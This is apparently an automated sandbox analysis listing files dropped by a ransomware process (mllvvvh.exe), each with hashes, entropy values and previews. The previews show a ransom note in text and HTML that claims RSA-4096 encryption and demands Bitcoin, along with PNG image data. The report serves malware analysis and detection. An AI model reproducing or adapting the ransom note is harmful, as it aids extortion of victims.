                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{33d78dbc-3db7-4398-8533-000d7c02e5d1}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
